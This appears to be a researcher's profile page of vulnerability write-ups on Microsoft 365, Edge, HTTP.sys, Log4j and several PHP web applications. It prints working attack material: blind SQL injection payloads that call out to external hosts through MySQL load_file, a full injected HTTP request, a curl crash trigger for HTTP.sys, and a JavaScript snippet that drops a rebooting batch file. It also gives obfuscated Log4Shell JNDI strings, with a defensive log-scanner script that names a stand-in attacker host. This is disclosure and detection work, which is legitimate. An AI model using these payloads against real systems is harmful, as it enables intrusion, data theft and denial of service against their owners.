nu11secur1ty (162)
Last Login: May 17, 2022
nu11secur1ty's Latest (20) Contributions
Technical Analysis
CVE-2022-29110
Description:
The Microsoft 365 version 2204-Build-15128.20178 is vulnerable to RCE.
The malicious attacker can share a malicious .docm file in some of the internal or external networks by using a malicious FTP server, and he can infect all computers in this network. The infected user can visit a very dangerous website, and when he clicks it he can execute a bunch of malicious javascript codes or can execute dangerous local code! Also, the malicious author can use a USB flash memory to infect every computer by using Microsoft 365 software.
Known Affected Software
Vendor    | Product                   | Version
Microsoft | Microsoft_Excel           | 2016 (32-bit edition)
Microsoft | Microsoft_Excel           | 2016 (64-bit edition)
Microsoft | Microsoft_Excel           | 2013 RT Service Pack 1
Microsoft | Microsoft_Excel           | 2013 Service Pack 1 (32-bit editions)
Microsoft | Microsoft_Excel           | 2013 Service Pack 1 (64-bit editions)
Microsoft | Microsoft_Office_Web_Apps | Server 2013 Service Pack 1
Reproduce:
Proof and Exploit
Technical Analysis
CVE-NU11-2021-1101
Description:
The OPH – PHP (by: oretnom23) v1.0 is vulnerable to remote SQL-Injection-Bypass-Authentication and PHPSESSID Hijacking.
remote SQL-Injection-Bypass-Authentication: https://portswigger.net/support/using-sql-injection-to-bypass-authentication.
The parameter (username) from the login form is not protected correctly and there is no security and escaping from malicious payloads.
When the user sends a malicious query or malicious payload to the MySQL server for those three accounts, he can bypass the login credentials and take control of these accounts.
Also, the attacker can use PHPSSESSID to steal the session to the admin account. Disaster, online payment system WTF.
Reproduce:
Proof
Technical Analysis
CVE-2022-21906
Microsoft
Vendor
Description
Windows Defender Application Control Security Feature Bypass Vulnerability.
The attacker can execute extremely dangerous apps by using different scenarios,
directly from the user profile, without any reaction from the side of the Windows Defender.
Read more: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21906
The latest version of Windows 10 Pro, plus the latest update!
Reproduce:
Proof and Exploit
BugCheck after the exploit, the reaction of the kernel:
BSOD.exe
1: kd> !analyze
*******************************************************************************
* *
* Bugcheck Analysis *
* *
*******************************************************************************
Unknown bugcheck code (c0000022)
Unknown bugcheck description
Arguments:
Arg1: 0000000000000000
Arg2: 0000000000000000
Arg3: 0000000000000000
Arg4: 0000000000000000
Debugging Details:
------------------
ERROR_CODE: (NTSTATUS) 0xc0000022 - {Access Denied} A process has requested access to an object, but has not been granted those access rights.
BUGCHECK_CODE: c0000022
BUGCHECK_P1: 0
BUGCHECK_P2: 0
BUGCHECK_P3: 0
BUGCHECK_P4: 0
PROCESS_NAME: BSOD.exe
SYMBOL_NAME: nt!PopTransitionSystemPowerStateEx+1217
MODULE_NAME: nt
IMAGE_NAME: ntkrnlmp.exe
FAILURE_BUCKET_ID: STATUS_ACCESS_DENIED_nt!PopTransitionSystemPowerStateEx
FAILURE_ID_HASH: {7fcb0a96-b639-2e09-82d6-2eef48bdcdea}
Followup: MachineOwner
---------
malicious.exe
0: kd> !analyze
*******************************************************************************
* *
* Bugcheck Analysis *
* *
*******************************************************************************
Unknown bugcheck code (c0000022)
Unknown bugcheck description
Arguments:
Arg1: 0000000000000000
Arg2: 0000000000000000
Arg3: 0000000000000000
Arg4: 0000000000000000
Debugging Details:
------------------
ERROR_CODE: (NTSTATUS) 0xc0000022 - {Access Denied} A process has requested access to an object, but has not been granted those access rights.
BUGCHECK_CODE: c0000022
BUGCHECK_P1: 0
BUGCHECK_P2: 0
BUGCHECK_P3: 0
BUGCHECK_P4: 0
PROCESS_NAME: malicious.exe
SYMBOL_NAME: nt!PopTransitionSystemPowerStateEx+1217
MODULE_NAME: nt
IMAGE_NAME: ntkrnlmp.exe
FAILURE_BUCKET_ID: STATUS_ACCESS_DENIED_nt!PopTransitionSystemPowerStateEx
FAILURE_ID_HASH: {7fcb0a96-b639-2e09-82d6-2eef48bdcdea}
Followup: MachineOwner
---------
BR
.\nu11secur1ty
Technical Analysis
CVE-2022-21970
Description
Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability.
This vulnerability allows an attacker to execute javascript code on every host without permission; also an attacker can steal local system files, and he can manipulate the actions against the machine, resulting in changes to internal developer settings in Microsoft Edge.
- NOTE: In this example, Microsoft Edge executes a malicious script without problems.
This is just a malicious .bat file that reboots the infected machine, and it’s only for testing!
The attacker can create a malicious file that can take a privileges escalation, malware, spyware, or kernel exploit file and harm seriously your device!
Not correctly sanitizing and checking what users download on their machines by using MsEdge!
NOTE after the exploit: A malicious user, or whatever user, can execute directly malicious .bat files which are created – generated from this javascript exploit by using MsEdge. 😁
According to Edge, this file is safe to run and open. 😁
FAQ
What is the version information for this release?
Microsoft Edge Version | Date Released | Based on Chromium Version
97.0.1072.55 | 1/6/2022 | 97.0.4692.71
STATUS:
- Patched and fixed on!
The next test is checking if this is fully patched! 🤫 😛 😎
Proof and simple browser test MsEdge: Edge is blocking .sys files because they can harm your device:
This proof of concept shows how the MsEdge browser is NOT blocking .bat files, and this is a problem.
NOTE: A malicious user, or whatever user, can execute directly malicious .bat files which are created – generated by using exactly MsEdge and this javascript exploit.
This is ridiculous and incorrect sanitizing! 😁
According to Edge, this file is safe to run and open. 😁
Screenshot, example:
In Action:
- download the PoC
- extract it somewhere
- Execute:
start msedge C:\Users\user2022\Desktop\ExploitServer\examples\exploit.html
Example from the function():
$start.onclick = () => {
  const blob = new Blob(['shutdown /r'])
  const fileStream = streamSaver.createWriteStream('pwned.bat', {
    size: blob.size // Makes the percentage visible in the download
  })
}
Reproduce:
Proof and Exploit:
- BR nu11secur1ty
Ooh, my friend, good afternoon =) Obviously, you don’t understand that the problem is not fixed completely.
So, the versions 1908, server 1909, and 2019 versions are not vulnerable by default; they are already patched on the PROD iso and the problem is fixed, but not yet :D. But if you decide to UPGRADE these products, from 1809 > 1909 to 2004: BOOM – congratulation :D Microsoft has changed the description of the problem, and what is vulnerable and what is not. Please read it again!!! We have opened a new case for this CVE + so the information is confidential, and I’m sorry that I can not share more details for the newly opened case!!! As I mentioned, we discovered the problem last year, and I’m glad that you found out about our discussion with 0verkl0k :D This is already reported, and we work on it with Microsoft. So. Do not play with my patience my friend, please!
KR
Technical Analysis
CVE-2021-44655
Software
Vendor
Description:
The bid, c & id parameters from the /used_car_showroom/ node app on Online-Pre-owned/Used Car Showroom Management 1.0 system appear to be vulnerable to multiple time-based blind SQL injection attacks. The payload '+(select load_file('\2z2p3k6kl8xuxf3ykb2dc84ocfi8600orrfi29qy.nu11secur1typenetrationtestingengineer.net\nxj'))+' was submitted in the bid parameter. This payload injects a SQL sub-query that calls MySQL’s load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed. The attacker can take administrator account control on this system. Status: CRITICAL
[+] Payloads:
- Multiple: bid, c & id
---
Parameter: bid (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: page=product_per_brand&bid=7'+(select load_file('\\\\2z2p3k6kl8xuxf3ykb2dc84ocfi8600orrfi29qy.nu11secur1typenetrationtestingengineer.net\\nxj'))+'' AND (SELECT 3670 FROM (SELECT(SLEEP(5)))hxug) AND 'ovPl'='ovPl
---
---
Parameter: c (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: page=categories&c=2'+(select load_file('\\\\xyzk2f5fk3wpwa2tj618b33jbah35vvjmmadx4lt.nu11secur1typenetrationtestingengineers.net\\thk'))+'' AND (SELECT 4821 FROM (SELECT(SLEEP(3)))DuhP) AND 'vkhG'='vkhG
---
---
Parameter: id (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: page=view_product&id=3'+(select load_file('\\\\rc7eg9j9yxaja4gnx0f2pxhdp4vxj17sag13srh.nu11secur1typenetrationtestingengineers.net\\deo'))+'' AND (SELECT 8828 FROM (SELECT(SLEEP(3)))VaSc) AND 'gDVf'='gDVf
---
Reproduce:
Proof and Exploit:
Technical Analysis
CVE-2022-21907
MSRC
Description:
NOTE: After a couple of hours of tests and experiments, I found that there have been no vulnerabilities; this is just a ridiculous experiment of Microsoft. When I decided to install the IIS packages on these Windows platforms, everything was ok, and everything is patched! Windows Server 2019 and Windows 10 version 1809 – 2018 year are not vulnerable by default, but after I decided to upgrade from 1909 to 2004, I found a serious problem! The Windows 10 version 2004 – 2020 year is still vulnerable to the HTTP Protocol Stack (HTTP.sys). Attack method: buffer overflow – denial of service and restart of the system. This problem exists from last year, when it was reported as CVE-2021-31166, and is still there! In those days I worked on it again with the help and collaboration of Axel Souchet 0vercl0k, the author of the idea. On that day, I wrote only a one-line command to exploit this vulnerability!
Status: CRITICAL
- NOTE:
The HTTP Trailer Support feature that contains the vulnerability is not active by default.
The following registry key must be configured to introduce the vulnerable condition:
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\HTTP\Parameters\ "EnableTrailerSupport"=dword:00000001
This mitigation does not apply to the other affected versions.
Faq
How could an attacker exploit this vulnerability?
- In most situations, an unauthenticated attacker could send a specially crafted packet to a targeted server utilizing the HTTP Protocol Stack (http.sys) to process packets.
Is this wormable?
- Yes. Microsoft recommends prioritizing the patching of affected servers.
Simple test connection before debugging:
curl "http://192.168.1.8/201" -H "Accept-Encoding: pwn, pwned, package"
- Output:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>404 - File or directory not found.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div> </div> </body> </html>
302
curl "http://192.168.1.8/302" -H "Accept-Encoding: pwn, pwned, package"
- Output:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>404 - File or directory not found.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div> </div> </body> </html>
404
curl "http://192.168.1.8/404" -H "Accept-Encoding: pwn, pwned, package"
- Output:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>404 - File or directory not found.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div> </div> </body> </html>
Bugcheck:
1: kd> kp
Child-SP          RetAddr           Call Site
ffffa102`87993158 fffff806`50404929 nt!KeBugCheckEx
ffffa102`87993160 fffff806`50404d50 nt!KiBugCheckDispatch+0x69
ffffa102`879932a0 fffff806`504030e3 nt!KiFastFailDispatch+0xd0
ffffa102`87993480 fffff806`4f33f537 nt!KiRaiseSecurityCheckFailure+0x323
ffffa102`87993610 fffff806`4f2f6ac5 HTTP!UlFreeUnknownCodingList+0x63
ffffa102`87993640 fffff806`4f2cd191 HTTP!UlpParseAcceptEncoding+0x298f5
ffffa102`87993730 fffff806`4f2a9368 HTTP!UlAcceptEncodingHeaderHandler+0x51
ffffa102`87993780 fffff806`4f2a8a47 HTTP!UlParseHeader+0x218
ffffa102`87993880 fffff806`4f204c5f HTTP!UlParseHttp+0xac7
ffffa102`879939e0 fffff806`4f20490a HTTP!UlpParseNextRequest+0x1ff
ffffa102`87993ae0 fffff806`4f2a4852 HTTP!UlpHandleRequest+0x1aa
ffffa102`87993b80 fffff806`5035b715 HTTP!UlpThreadPoolWorker+0x112
ffffa102`87993c10 fffff806`503fa078 nt!PspSystemThreadStartup+0x55
ffffa102`87993c60 00000000`00000000 nt!KiStartSystemThread+0x28
1: kd> !analyze
*******************************************************************************
* *
* Bugcheck Analysis *
* *
*******************************************************************************
KERNEL_SECURITY_CHECK_FAILURE (139)
A kernel component has corrupted a critical data structure. The corruption could potentially allow a malicious user to gain control of this machine.
Arguments:
Arg1: 0000000000000003, A LIST_ENTRY has been corrupted (i.e. double remove).
Arg2: ffffa10287993480, Address of the trap frame for the exception that caused the bugcheck
Arg3: ffffa102879933d8, Address of the exception record for the exception that caused the bugcheck
Arg4: 0000000000000000, Reserved
Debugging Details:
------------------
*** WARNING: Unable to verify timestamp for win32k.sys
BUGCHECK_CODE: 139
BUGCHECK_P1: 3
BUGCHECK_P2: ffffa10287993480
BUGCHECK_P3: ffffa102879933d8
BUGCHECK_P4: 0
PROCESS_NAME: System
ERROR_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.
SYMBOL_NAME: HTTP!UlFreeUnknownCodingList+63
MODULE_NAME: HTTP
IMAGE_NAME: HTTP.sys
FAILURE_BUCKET_ID: 0x139_3_CORRUPT_LIST_ENTRY_HTTP!UlFreeUnknownCodingList
FAILURE_ID_HASH: {1b194f54-2d0b-e3a8-62e2-afded08822bd}
Followup: MachineOwner
---------
Exploit after bugcheck:
Aftershock:
Music:
Reproduce:
Proof and Exploit:
IMPORTANT!!!
- Microsoft: They said: We don’t support anymore this Windows 10 version 2004!
- Wooooow, this is so young version, and for one bug you will deprecate this distro!?
- WTF :D
WARNING!!!
- Dear users, you must fix your problem with this version 2004, alone!
- So, follow the steps, I will help you if you need to use exactly this version of Windows 10 2004
CONCLUSION!
If you decide to UPGRADE from 1809 > 1909 to 2004, you MUST INSTALL all PATCHES for version 2004 to the LATEST from Microsoft!!!
After Update – RECOMMENDED:
1.
2.
3.
Done:
- The problem with version 2004 is fixed, after installing all patches and updates!
Proof:
NOTE!!
In the world there are hundreds of thousands of machines using exactly this version that are still not `updated` for some reason or whatever! You can imagine what is going on if some malicious user detects them!
Latest information:
Please, stay informed of the case on:
https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21907
- m0r3:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21907
KR @nu11secur1t
Technical Analysis
Software
Explanation: log4j
Collaboration: burp-log4shell
- Thanks
More
CVE
Protect yourself, before you break yourself… ;)
Description:
Apache Log4j2 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0, this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.
Usage and explanation:
Demonstration of scanning for the Log4j vulnerability
- NOTE: For advanced users!
Manual installing the extension for BurpSuite
IMPORTANT:
- Check in to BApp Store if all components are deployed!
>>> from log4shell_regexes import *
>>> t = lambda s: [k for k in test(s)]
>>> tt = lambda s: [(k, list(v.keys())) for k, v in test_thorough(s).items()]
>>> t('${ jndi\t: addr\n}')
['SIMPLE_RE', 'ANY_RE', 'ANY_INCL_ESCS_RE', 'SIMPLE_OPT_RCURLY_RE', 'ANY_OPT_RCURLY_RE', 'ANY_INCL_ESCS_OPT_RCURLY_RE']
>>> t('${ jndi\t: addr\n')
['SIMPLE_OPT_RCURLY_RE', 'ANY_OPT_RCURLY_RE', 'ANY_INCL_ESCS_OPT_RCURLY_RE']
>>> t('\044%7B\\44{env:NOTHING:-j}\u0024{lower:N}\\u0024{lower:${upper:d}}}i:addr}')
['SIMPLE_ESC_VALUE_RE', 'NESTED_RE', 'NESTED_INCL_ESCS_RE', 'ANY_RE', 'ANY_INCL_ESCS_RE', 'SIMPLE_ESC_VALUE_OPT_RCURLY_RE', 'NESTED_OPT_RCURLY_RE', 'NESTED_INCL_ESCS_OPT_RCURLY_RE', 'ANY_OPT_RCURLY_RE', 'ANY_INCL_ESCS_OPT_RCURLY_RE']
>>> t('${base64:d2hvIHRob3VnaHQgYW55IG9mIHRoaXMgd2FzIGEgZ29vZCBpZGVhPwo=}')
['ANY_RE', 'ANY_INCL_ESCS_RE', 'ANY_OPT_RCURLY_RE', 'ANY_INCL_ESCS_OPT_RCURLY_RE']
>>> t('%24%7Bjnd%24%7Bupper%3A%C4%B1%7D%3Aaddr%7D')
['NESTED_INCL_ESCS_RE', 'ANY_INCL_ESCS_RE', 'NESTED_INCL_ESCS_OPT_RCURLY_RE', 'ANY_INCL_ESCS_OPT_RCURLY_RE']
>>> t('$%7B\u006a\\156di:addr\\x7d')
['ANY_INCL_ESCS_RE', 'ANY_INCL_ESCS_OPT_RCURLY_RE']
>>> t('${jndi:${lower:l}${lower:d}a${lower:p}://$a{upper:d}dr}')
['SIMPLE_RE', 'NESTED_RE', 'NESTED_INCL_ESCS_RE', 'ANY_RE', 'ANY_INCL_ESCS_RE', 'SIMPLE_OPT_RCURLY_RE', 'NESTED_OPT_RCURLY_RE', 'NESTED_INCL_ESCS_OPT_RCURLY_RE', 'ANY_OPT_RCURLY_RE', 'ANY_INCL_ESCS_OPT_RCURLY_RE']
>>> t('${jndi:dns://addr}')
['SIMPLE_RE', 'ANY_RE', 'ANY_INCL_ESCS_RE', 'SIMPLE_OPT_RCURLY_RE', 'ANY_OPT_RCURLY_RE', 'ANY_INCL_ESCS_OPT_RCURLY_RE']
>>> t('${${base64:am5kaTpsZGFwOi8vYWRkcgo=}}') # LOG4J2-2446
['NESTED_RE', 'NESTED_INCL_ESCS_RE', 'ANY_RE', 'ANY_INCL_ESCS_RE', 'NESTED_OPT_RCURLY_RE', 'NESTED_INCL_ESCS_OPT_RCURLY_RE', 'ANY_OPT_RCURLY_RE', 'ANY_INCL_ESCS_OPT_RCURLY_RE']
>>> t('${jndi:${lower:l}${lower:d}a${lower:p}://addr')
['SIMPLE_RE', 'NESTED_RE', 'NESTED_INCL_ESCS_RE', 'ANY_RE', 'ANY_INCL_ESCS_RE', 'SIMPLE_OPT_RCURLY_RE', 'NESTED_OPT_RCURLY_RE', 'NESTED_INCL_ESCS_OPT_RCURLY_RE', 'ANY_OPT_RCURLY_RE', 'ANY_INCL_ESCS_OPT_RCURLY_RE']
>>> t('${${::-j}nd${upper:ı}:rm${upper:ı}://addr}')
['NESTED_RE', 'NESTED_INCL_ESCS_RE', 'ANY_RE', 'ANY_INCL_ESCS_RE', 'NESTED_OPT_RCURLY_RE', 'NESTED_INCL_ESCS_OPT_RCURLY_RE', 'ANY_OPT_RCURLY_RE', 'ANY_INCL_ESCS_OPT_RCURLY_RE']
>>> t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//addr}')
['NESTED_RE', 'NESTED_INCL_ESCS_RE', 'ANY_RE', 'ANY_INCL_ESCS_RE', 'NESTED_OPT_RCURLY_RE', 'NESTED_INCL_ESCS_OPT_RCURLY_RE', 'ANY_OPT_RCURLY_RE', 'ANY_INCL_ESCS_OPT_RCURLY_RE']
>>> t('%5Cu002524%257Bjnd%2524%257Bupper%255Cu003a%255C%255C461%257D%253Aldap%253A%5C0452F%252Faddr%257D')
[]
>>> tt('%5Cu002524%257Bjnd%2524%257Bupper%255Cu003a%255C%255C461%257D%253Aldap%253A%5C0452F%252Faddr%257D')
[
  ( '\\u002524%7Bjnd%24%7Bupper%5Cu003a%5C%5C461%7D%3Aldap%3A\\0452F%2Faddr%7D',
    ['NESTED_INCL_ESCS_RE', 'ANY_INCL_ESCS_RE', 'NESTED_INCL_ESCS_OPT_RCURLY_RE', 'ANY_INCL_ESCS_OPT_RCURLY_RE'] ),
  ( '${jnd${upper\\u003a\\\\461}:ldap://addr}',
    ['SIMPLE_ESC_VALUE_RE', 'NESTED_RE', 'NESTED_INCL_ESCS_RE', 'ANY_RE', 'ANY_INCL_ESCS_RE', 'SIMPLE_ESC_VALUE_OPT_RCURLY_RE', 'NESTED_OPT_RCURLY_RE', 'NESTED_INCL_ESCS_OPT_RCURLY_RE', 'ANY_OPT_RCURLY_RE', 'ANY_INCL_ESCS_OPT_RCURLY_RE'] ),
  ( '${jnd${upper:\\461}:ldap://addr}',
    ['SIMPLE_ESC_VALUE_RE', 'NESTED_RE', 'NESTED_INCL_ESCS_RE', 'ANY_RE', 'ANY_INCL_ESCS_RE', 'SIMPLE_ESC_VALUE_OPT_RCURLY_RE', 'NESTED_OPT_RCURLY_RE', 'NESTED_INCL_ESCS_OPT_RCURLY_RE', 'ANY_OPT_RCURLY_RE', 'ANY_INCL_ESCS_OPT_RCURLY_RE'] ),
  ( '${jnd${upper:ı}:ldap://addr}',
    ['NESTED_RE', 'NESTED_INCL_ESCS_RE', 'ANY_RE', 'ANY_INCL_ESCS_RE', 'NESTED_OPT_RCURLY_RE', 'NESTED_INCL_ESCS_OPT_RCURLY_RE', 'ANY_OPT_RCURLY_RE', 'ANY_INCL_ESCS_OPT_RCURLY_RE'] )
]
Docker vulnerable app:
cd vuln_app/CVE-2021-44228-VULN-APP/
docker build -t log4j-shell-poc .
docker run --network host log4j-shell-poc
- Listening on port 8080
Support for vulnerable machine APP by kozmer
Support for Burp module by silentsignal
Demo, testing, and debugging by nu11secur1ty
Video and reproduce of the vulnerability
- NOTE: The test is outside of the credentials for login! ;)
More
Information
Scanner
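The regex session above comes from the silentsignal Burp extension's own test module, and it makes one point clearly: a scanner that only greps for the literal string `${jndi:` misses nested lookups, percent-encoding and unicode escapes. As an added example (not code from that extension, from the vulnerable app, or from this post), the following Python script shows the normalization a defender's log scanner needs before matching: it percent-decodes, resolves `\uXXXX` escapes, collapses `${lower:}`, `${upper:}` and `${...:-default}` lookups to the text they evaluate to, and only then looks for the `${jndi:` lookup that remains. The access-log lines and the host name attacker.example are constructed for the example.

```python
import re
import urllib.parse

# Lookups whose result is a plain substring, used in the wild to hide the "jndi"
# keyword from naive pattern matching:
#   ${lower:J} / ${upper:ı}       -> the case-folded value
#   ${env:NOT_SET:-j} / ${::-j}   -> the default value after ":-"
_CASE_LOOKUP = re.compile(r'\$\{\s*(lower|upper)\s*:([^${}]*)\}', re.IGNORECASE)
_DEFAULT_LOOKUP = re.compile(r'\$\{[^${}]*?:-([^${}]*)\}')
_UNICODE_ESC = re.compile(r'\\u([0-9a-fA-F]{4})')
_JNDI_LOOKUP = re.compile(r'\$\{\s*jndi\s*:', re.IGNORECASE)


def _fold_case(m: re.Match) -> str:
    value = m.group(2)
    return value.lower() if m.group(1).lower() == 'lower' else value.upper()


def normalize(text: str, rounds: int = 6) -> str:
    """Peel off encoding and lookup layers until the string stops changing.

    Each round resolves only the innermost lookups (the patterns exclude '${}'
    inside the value), so nested payloads unwind one layer per round.
    """
    for _ in range(rounds):
        before = text
        text = urllib.parse.unquote(text)                                   # %24%7B -> ${
        text = _UNICODE_ESC.sub(lambda m: chr(int(m.group(1), 16)), text)   # \u0024 -> $
        text = _CASE_LOOKUP.sub(_fold_case, text)                           # ${lower:J} -> j
        text = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), text)              # ${::-j} -> j
        if text == before:
            break
    return text


def is_log4shell_probe(text: str) -> bool:
    """True when a ${jndi: lookup survives normalization."""
    return _JNDI_LOOKUP.search(normalize(text)) is not None


def scan_log_lines(lines):
    """Indices of the lines that carry a JNDI lookup after normalization."""
    return [i for i, line in enumerate(lines) if is_log4shell_probe(line)]


# Constructed sample access-log lines (not real traffic); attacker.example is a placeholder.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - "GET /index.html" 200 "Mozilla/5.0"',
    '10.0.0.6 - - "GET /login" 200 "${jndi:ldap://attacker.example/a}"',
    '10.0.0.7 - - "GET /api" 200 "${${lower:J}ndi:${lower:L}dap://attacker.example/b}"',
    '10.0.0.8 - - "GET /x" 200 "%24%7Bjndi%3Aldap%3A%2F%2Fattacker.example%2Fc%7D"',
    '10.0.0.9 - - "GET /y" 200 "\\u0024{jndi:rmi://attacker.example/d}"',
    '10.0.0.10 - - "GET /z" 200 "${${::-j}nd${upper:\u0131}:rm${upper:\u0131}://attacker.example/e}"',
    '10.0.0.11 - - "GET /w" 200 "${date:yyyy-MM-dd}"',
]

if __name__ == '__main__':
    for i in scan_log_lines(SAMPLE_LOG_LINES):
        print(f'line {i}: {normalize(SAMPLE_LOG_LINES[i])}')
```

The dotless-i case (`${upper:ı}`) is why the final match is case-insensitive: Python's `'ı'.upper()` yields a plain `I`, exactly as Log4j's `upper` lookup does, so the normalized text reads `${jndI:...}`. The last sample line shows that a benign `${date:...}` lookup is left alone; a scanner that alerts on every `${` would drown in false positives on applications that log template strings.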
Technical Analysis
Online-Enrollment-Management-System
Vendor
Description:
The id parameter from Online Enrollment Management System 1.0 appears to be vulnerable to SQL injection attacks.
The payload (select load_file(’\\5bhtyx01jb7u7d6h2uthd4khq8w1ktch3jrbe12q.nu11secur1typentestingengineer.net\ofp’)) was submitted in the id parameter. This payload injects a SQL sub-query that calls MySQL’s load_file function with a UNC file path that references a URL on an external domain.
The application interacted with that domain, indicating that the injected SQL query was executed.
The attacker can retrieve sensitive information for all users of this system.
STATUS: Critical and Awful.
MySQL Request:
POST /onlineenrolmentsystem/menu1.php HTTP/1.1
Host: 192.168.10.73
Origin: http://192.168.10.73
Cookie: PHPSESSID=5hjqmc8ms45586p1rqdv1ld9gd
Accept: text/plain, */*; q=0.01
X-Requested-With: XMLHttpRequest
Referer: http://192.168.10.73/onlineenrolmentsystem/index.php?q=department
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Length: 5

id=(select%20load_file('%5c%5c%5c%5c5bhtyx01jb7u7d6h2uthd4khq8w1ktch3jrbe12q.nu11secur1typenetrationtestingengineer.net%5c%5cofp'))
MySQL Response:
HTTP/1.1 200 OK
Date: Fri, 03 Dec 2021 12:11:35 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.24
X-Powered-By: PHP/7.4.24
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 159
Connection: close
Content-Type: text/html; charset=UTF-8

<!-- Projects Row -->
<div class="row">
<div class="col-md-12">
<ul>
</ul>
</div>
</div>
<!-- /.row -->
Reproduce:
Proof and Exploit:
Technical Analysis
CVE-2021-41646
Vendor
Description:
Remote Code Execution (RCE) vulnerability exists in Sourcecodester Online Reviewer System 1.0 by uploading a maliciously crafted PHP file that bypasses the image upload filters.
The vulnerable directory can be used by the directory traversal method in the browser from the attacker to retrieve sensitive information or destroy the system by using an RCE method for this action!
Status: CRITICAL
Reproduce:
Proof and Exploit
Technical Analysis
CVE-2021-42668
Vendor
Description
The id parameter from my_classmates.php in Engineers Online Portal 1.0 appears to be vulnerable to SQL injection and RCE attacks.
The payload ‘+(select load_file(’\\n0o5m5xdxay49mw826umfj1wsnygm9ix90xrkh86.nu11secur1tyPenetrationTestingEngineer.net\sch’))+’ was submitted in the id parameter.
This payload injects a SQL sub-query that calls MySQL’s load_file function with a UNC file path that references a URL on an external domain.
The application interacted with that domain, indicating that the injected SQL query was executed.
The attacker can bypass the admin account and he can upload malicious code by using the avatar vulnerability function with the directory traversal method, then he can execute this malicious code. For this example, the attacker destroys all files in the current directory.
STATUS: Hyper Critical and Awful.
